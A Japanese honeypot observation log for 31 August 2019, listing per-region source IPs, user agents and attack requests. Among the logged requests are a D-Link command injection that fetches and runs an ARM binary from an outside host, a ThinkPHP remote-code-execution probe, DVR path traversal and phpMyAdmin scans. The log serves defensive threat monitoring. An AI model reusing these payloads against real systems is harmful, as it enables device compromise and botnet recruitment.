ハニーポット(仮) 観測記録 2019/08/31分です。
特徴
Region:AP
D-Link製品の脆弱性を狙うアクセス
HiSilicon DVR Devicesの脆弱性を狙うアクセス
ThinkPHPの脆弱性を狙うアクセス
phpMyAdminに対するスキャン行為
110[.]249[.]212[.]46に関する不正通信
を確認しました。
Region:US
HiSilicon DVR Devicesの脆弱性を狙うアクセス
を確認しました。
Region:EU
phpMyAdminに対するスキャン行為
を確認しました。
他
アクセス数推移
AP:総アクセス数:45 (前日比:+33)
US:総アクセス数:11 (前日比:+9)
EU:総アクセス数:7 (前日比:-19)
都合により GET / HTTP/1.1 POST / HTTP/1.1 は除いています。
Region:AP
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 4 | 106.75.103.138 | China |
| 5 | 110.249.212.46 | China |
| 4 | 113.125.65.227 | China |
| 3 | 119.17.142.225 | Australia |
| 4 | 124.156.164.41 | Singapore |
| 1 | 154.243.196.148 | Algeria |
| 1 | 169.53.128.149 | United States |
| 1 | 182.253.169.176 | Indonesia |
| 1 | 193.169.254.11 | Poland |
| 1 | 200.82.105.233 | Argentina |
| 1 | 203.30.236.108 | Indonesia |
| 1 | 61.219.11.153 | Taiwan |
| 1 | 66.249.71.123 | United States |
| 4 | 71.6.199.23 | United States |
| 3 | 77.247.110.69 | Estonia |
| 4 | 80.82.77.139 | Seychelles |
| 4 | 80.82.77.33 | Seychelles |
| 1 | 89.248.174.219 | Seychelles |
| 1 | 93.80.160.11 | Russia |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 21 | - |
| 3 | Go-http-client/1.1 |
| 1 | MOT-V177/0.1.75 UP.Browser/6.2.3.9.c.12 (GUI) MMP/2.0 UP.Link/6.3.1.13.0 |
| 1 | Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html) |
| 1 | Mozilla/5.0 (Linux; Android 8.0.0; Pixel XL Build/OPR6.170623.012) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.107 Mobile Safari/537.36 |
| 3 | Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/72.0.3626.119 Safari/537.36 |
| 1 | Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0 |
| 9 | Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6) |
| 1 | Mozilla/5.0 (X11; OpenBSD amd64; rv:30.0) Gecko/20100101 Firefox/30.0 |
| 1 | Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36 |
| 2 | python-requests/2.13.0 |
| 1 | python-requests/2.19.1 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | - | ||
| 1 | GET | /cgi-bin/webcm?getpage=../html/menus/menu2.html&var:lang=%26%cd%20%2Ftmp%2F%3B%20wget%20http%3A%2F%2F80[.]82[.]65[.]213%2Fmoo%2Farmv4l%3B%20chmod%20777%20armv4l%3B%20.%2Farmv4l%20%26 | HTTP/1.1 |
| 3 | GET | /favicon.ico | HTTP/1.1 |
| 5 | GET | http://110[.]249[.]212[.]46/testget?q=23333&port=80 | HTTP/1.1 |
| 1 | GET | ../../mnt/custom/ProductDefinition | HTTP |
| 1 | GET | /mysql/admin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /mysql/dbadmin/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /mysql/sqlmanager/index.php?lang=en | HTTP/1.1 |
| 1 | GET | /phpmyadmin/scripts/setup.php | HTTP/1.1 |
| 4 | GET | /robots.txt | HTTP/1.1 |
| 4 | GET | /Security/users?auth=YWRtaW46MTEK | HTTP/1.1 |
| 3 | GET | /sitemap.xml | HTTP/1.1 |
| 3 | GET | /TP/index.php | HTTP/1.1 |
| 3 | GET | /TP/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 | HTTP/1.1 |
| 3 | GET | /TP/public/index.php | HTTP/1.1 |
| 3 | GET | /.well-known/security.txt | HTTP/1.1 |
| 1 | HEAD | /robots.txt | HTTP/1.0 |
| 2 | HEAD | /robots.txt | HTTP/1.1 |
| 3 | POST | /TP/index.php?s=captcha | HTTP/1.1 |
| 1 | \x16\x03\x02 |
Region:US
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 14.41.14.87 | South Korea |
| 1 | 179.53.27.180 | Dominican Republic |
| 4 | 189.55.4.192 | Brazil |
| 1 | 61.219.11.153 | Taiwan |
| 1 | 77.247.110.69 | Estonia |
| 1 | 91.48.40.47 | Germany |
| 1 | 92.124.150.0 | Russia |
| 1 | 94.129.94.193 | Kuwait |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 9 | - |
| 1 | Mozilla/4.77 [en] (X11; I; IRIX;64 6.5 IP30) |
| 1 | Mozilla/5.0 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | - | ||
| 7 | GET | ../../mnt/custom/ProductDefinition | HTTP |
| 1 | GET | /Security/users?auth=YWRtaW46MTEK | HTTP/1.1 |
| 1 | GET | /shell?busybox | HTTP/1.1 |
| 1 | HEAD | /robots.txt | HTTP/1.0 |
Region:EU
送信元IPアドレス一覧
| 件数 | 送信元IPアドレス | 国 |
|---|---|---|
| 1 | 113.160.154.57 | Vietnam |
| 1 | 178.128.40.242 | Netherlands |
| 2 | 222.186.175.122 | China |
| 1 | 59.98.144.109 | India |
| 1 | 61.219.11.153 | Taiwan |
| 1 | 77.247.110.69 | Estonia |
UserAgent一覧
| 件数 | UserAgent |
|---|---|
| 2 | - |
| 2 | Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1) |
| 1 | Mozilla/5.0 (Linux; U; Android 2.1; en-us; Nexus One Build/ERD62) AppleWebKit/530.17 (KHTML, like Gecko) Version/4.0 Mobile Safari/530.17 |
| 1 | Mozilla/5.0 (Windows NT 5.1; rv:9.0.1) Gecko/20100101 Firefox/9.0.1 |
| 1 | Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.1.16) Gecko/20120421 Gecko Firefox/11.0 |
リクエスト内容一覧
| 件数 | Method | Request | Protocol |
|---|---|---|---|
| 1 | - | ||
| 1 | GET | /doc/page/login.asp | HTTP/1.1 |
| 1 | GET | /HNAP1/ | HTTP/1.1 |
| 1 | GET | /phpmyadmin | HTTP/1.1 |
| 1 | GET | /phpmyadmin/ | HTTP/1.1 |
| 1 | GET | /Security/users?auth=YWRtaW46MTEK | HTTP/1.1 |
| 1 | HEAD | /robots.txt | HTTP/1.0 |
